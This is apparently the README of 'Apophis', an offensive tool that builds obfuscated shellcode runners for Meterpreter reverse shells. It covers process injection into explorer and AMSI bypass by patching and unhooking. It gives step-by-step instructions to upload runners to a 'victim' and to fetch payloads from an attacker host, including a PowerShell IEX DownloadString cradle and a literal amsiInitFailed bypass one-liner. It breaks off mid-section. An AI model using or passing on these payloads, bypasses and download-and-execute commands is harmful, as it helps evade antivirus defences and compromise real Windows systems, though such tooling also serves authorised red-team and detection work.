Description

Apophis project is a Bash script that leverages tools such as DotNetToJScript, ConfuserEx, Net-Obfuscator etc. in order to generate 'Shellcode runners' in various formats. To accomplish this, it uses Csharp templates that are compiled with Mono .Net Framework.

Apep (also spelled Apepi or Aapep) or Apophis (/əˈpoʊfɪs/;[1] Ancient Greek: Ἄποφις) was the ancient Egyptian deity who embodied chaos (ı͗zft in Egyptian) and was thus the opponent of light and Ma'at (order/truth). He appears in art as a giant serpent. His name is reconstructed by Egyptologists as *ʻAʼpāp(ī), as it was written ꜥꜣpp(y) and survived in later Coptic as Ⲁⲫⲱⲫ Aphōph.[2] Apep was first mentioned in the Eighth Dynasty, and he was honored in the names of the Fourteenth Dynasty king 'Apepi and of the Greater Hyksos king Apophis. - https://en.wikipedia.org/wiki/Apep

What kind of shellcode runners it generates?

• XOR (.exe, .dll)
• Caesar (.exe, .dll)
• AMSI Bypass (Patching, Unhooking)
• TripleDES (.exe)
• ASPX, Web.Config
• HTA, JS, XSL
• MSI
• InstallUtil (.exe)
• AES + Compression (.exe)

Installation

Apophis is using heavily the Mono project in order to compile the CS templates.

sudo apt-get install mono-complete

If your Linux host can't resolve the IP address, then try the following:

wget -q -O https://archive.kali.org/archive-key.asc | sudo apt-key add
sudo apt update
sudo apt-get install mono-complete

git clone https://github.com/tasox/Apophis

chmod +x apophis.sh
./Apophis

Download Wix binaries (MUST be fixed - Currently not working)

To generate an .MSI wrapper, you need first to download the wix311-binaries.zip and to unzip it under the MSI directory.

Note: The folder MUST have the name wix311-binaries.

cd Templates/MSI/
wget https://github.com/wixtoolset/wix3/releases/download/wix3112rtm/wix311-binaries.zip
unzip wix311-binaries.zip

cd MSI/wix311-binaries

┌──(kali㉿kali)-[~/…/Templates/MSI/wix311-binaries]
└─$ ls -ltr
total 14388
-rw-r--r--  1 kali kali    3369 Sep 15  2019 LICENSE.TXT
-rw-r--r--  1 kali kali  169832 Sep 15  2019 mergemod.dll
-rw-r--r--  1 kali kali  501248 Sep 15  2019 mergemod.cub
-rw-r--r--  1 kali kali    4233 Sep 15  2019 lux.targets
-rw-r--r--  1 kali kali  694784 Sep 15  2019 darice.cub
-rw-r--r--  1 kali kali   61952 Sep 15  2019 mspatchc.dll
...

The Wix binary (light.exe) that is responsible to generate your .MSI file, it needs the msi.dll. For this reason, you need to install Wine (if you don't have it already) or to update it to the latest version, to avoid errors related to msi.dll.

Install/Updating Wine on KALI

Method 1

echo "deb-src https://dl.winehq.org/wine-builds/debian/ buster main" >> /etc/apt/sources.list
apt update
apt install wine
winecfg

Method 2

# Enable 32 bit architecture
sudo dpkg --add-architecture i386

wget -O- -q https://download.opensuse.org/repositories/Emulators:/Wine:/Debian/Debian_10/Release.key | sudo apt-key add -
echo "deb http://download.opensuse.org/repositories/Emulators:/Wine:/Debian/Debian_10 ./" >> /etc/apt/sources.list
sudo apt update

# If 'wine' doesn't work, use 'wine-stablehq'
apt install wine

# Get 'wine' version
wine --version

# Download wine-mono
wget https://dl.winehq.org/wine/wine-mono/<choose the corrent package>

# Type the following command to show you the GUI from Wine.
wine64 uninstaller

# Press Install from the GUI
# Choose the wine-mono.msi installer that you downloaded on the previous step.

# You have installed Mono for Wine. Done :)

Usage

Folders

| Name | Description | | --- | --- | | Templates | Containing Shellcode Runners with and without encryption in various formats. | | payloads | Containing Shellcode Runners that can executed. | | ConfuserEx | Compiled files of ConfuserEx GitHub project. | | Net-Obfuscate | Compiled files of Net-Obfuscate GitHub project.|

Static Variables (Needs to modified)

Open with a text editor the bash file apophis.sh and edit the variables accordingly.

| Variables | Description | | --- | --- | | PROCESS_TO_INJECT | Contains the remote process name that you want to inject into. | | MSFVENOM_PAYLOAD | MSF Payload | | LHOST | Listener IP | | LPORT | Listener Port |

#!/bin/bash
...
PROCESS_TO_INJECT="explorer"
MSFVENOM_PAYLOAD="windows/x64/meterpreter/reverse_tcp"
LHOST="192.168.100.128"
LPORT=443
...

Payload prefixes

| Name | Description | | --- | --- | | _embedded | On the folder payloads/3DES/, if the generated payload contains the word embedded, it means the shellcode is located inside the generated shellcode runner. | | _marshal | If the generated payload contains the word marshal then payload will be injected to executable's memory space. | | _numa | If the generated payload contains the word numa then VirtualAllocExNuma was used insetad of VirtualAllocEx | | _FlsAlloc | If the generated payload contains the word FlsAlloc then FlsAlloc API was used. |

Payload Example

When payload is generated with name shellcode_runner_assembly_FlsAlloc_marshal.exe, it means:

• FlsAlloc API was used
• The Shellcode will be injected to executable's address space (Not to a remote process).

┌──(kali㉿kali)-[~/…/payloads/XOR]
└─$ ls -la                                                                                                                                                                                      127 ⨯
total 144
drwxr-xr-x 2 kali kali  4096 Mar 10 02:45 .
drwxr-xr-x 9 kali kali  4096 Feb  2 08:20 ..
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly.dll
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly.exe
-rwxr-xr-x 1 kali kali  5120 Mar 10 02:45 shellcode_runner_assembly_FlsAlloc_marshal.dll
-rwxr-xr-x 1 kali kali  5120 Mar 10 02:45 shellcode_runner_assembly_FlsAlloc_marshal.exe
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa.dll
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa.exe
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa_marshal.dll
-rwxr-xr-x 1 kali kali  5632 Mar 10 02:45 shellcode_runner_assembly_numa_marshal.exe
-rwxr-xr-x 1 kali kali 65131 Mar 10 02:45 shellcode_runner_cpp.exe
-rwxr-xr-x 1 kali kali  6144 Jan 24 23:05 shellcode_runner.dll

---

1. Shellcode Runners

1.1 Triple DES

The 3DES shellcode runners are located under payloads/3DES/ directory with names:

• des_decryptor.exe
• des_decryptor_embedded.exe
• des_decryptor_embedded_marshall.exe

Password, Salt and IV are static values but you can modified them as you need.

• Password: oqphnbt0kuedizy4m3avx6r5lf21jc8s
• Salt: vh9b4tsxrl1560wg8nda2meuc7yjzop3
• InitialVector: SBFTWSDXBYVOEMTD

1.1.1 Execution of des_decryptor.exe (Needs the path of Shellcode Runner)

The executable des_decryptor.exe doesn't contain a shellcode in it. For this reason, we have to provide a shellcode runner from the command-line. There are two 3DES encrypted Shellcode runners that you can put either to a Web or to an SMB Server:

• des_decryptor_embedded.exe (It will inject the shellcode into the remote process that you have provided in the line 11 of apophis.sh)
• des_decryptor_embedded_marshal.exe (It will inject the shellcode into des_decryptor.exe)

Steps

• Copy any 3DES Shellcode runner that is located under payloads/3DES/ to your Web/SMB Server
• Upload des_decryptor.exe to victim
• Execute it as follows

cmd> des_decryptor.exe http://KALI_IP/des_decryptor_embedded.exe
cmd> des_decryptor.exe smb://KALI_IP/des_decryptor_embedded.exe

cmd> des_decryptor.exe http://KALI_IP/des_decryptor_embedded_marshal.exe
cmd> des_decryptor.exe smb://KALI_IP/des_decryptor_embedded_marshal.exe

1.1.2 Execution of des_decryptor_embedded.exe

The executable des_decryptor_embedded.exe embeds the shellcode in base64, which before was ecrypted with TripleDESEncryptor.ps1. Doesn't need command-line arguments for the execution.

It will inject the shellcode into the remote process that you have provided in the line 11 of apophis.sh

Steps

• Upload the file to the victim
• Execute it as follows:

cmd> des_decryptor_embedded.exe

1.1.3 Execution of des_decryptor_embedded_marshal.exe

The executable des_decryptor_embedded_marshal.exe embeds the shellcode in base64, which before was ecrypted with TripleDESEncryptor.ps1. Doesn't need command-line arguments for the execution.

It will inject the shellcode to a memory space inside des_decryptor_embedded_marshal.exe process.

Steps

• Upload the file to the victim
• Execute it as follows:

cmd> des_decryptor_embedded_marshal.exe

---

1.2 AMSI Bypass

There are two methods to bypass AMSI:

• Patching
• Unhooking

Nice resource to have:

• https://amsi.fail/

1.2.1 Method 1 (Patching)

The execution of 1st method (Patching) is straight forward and uses well-known methodologies.

$m="System.Management.Automation.Ams";[Ref].Assembly.GetType("$m"+"iUtils").GetField('amsiInitFai'+'led','NonPublic,Static').SetValue($null,$true)

OR you can patch AMSI as follows.

# XOR RAX,RAX 
$buf = [Byte[]] (0x48,0x31,0xC0)  

Execute AMSI Shellcode runner

You can copy the payloads/AMSI/shellcode_runner.txt to your web server as shellcode_runner.html

powershell -nop -exec bypass -c IEX((New-Object Net.WebClient).DownloadString('http://<IP>/shellcode_runner.html')); 

1.2.2 Method 2 (Unhooking)

To unhook AMSI, I've used the project by jfmaes - AmsiHooker (https://github.com/jfmaes/AmsiHooker) and I've done some small modifications. When AmsiHooker executable will launched, it will download the Shellcode Runner from your web server and it will reflectively execute it.

Steps 1.